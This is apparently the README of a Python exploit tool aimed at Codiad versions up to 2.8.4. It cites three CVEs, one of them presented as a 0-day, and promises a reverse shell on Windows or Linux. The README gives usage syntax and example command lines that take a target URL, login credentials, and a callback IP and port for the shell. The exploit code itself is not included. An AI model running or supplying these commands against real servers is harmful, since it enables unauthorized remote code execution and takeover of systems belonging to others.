A simple exploit to execute system command on Codiad This tool will exploit the vuln Codiad application to get a reverse shell
- CVE-2017-11366
- CVE-2017-15689
- CVE-2018-14009 (0 Day exploitation)
<=2.8.4 (latest version)
Windows
Linux
Usage :
python exploit.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
python exploit.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example :
python exploit.py http://localhost/ admin admin 8.8.8.8 8888 linux
python exploit.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author :
WangYihang <[email protected]>
- 【CVE-2018-14009】 Codiad (2.8.4) RCE on Windows machine
- 【CVE-2018-14009】 Codiad (2.8.4) RCE on Linux machine
Windows
Linux
@mhaskar (Give suggestions for Windows platform exploitation)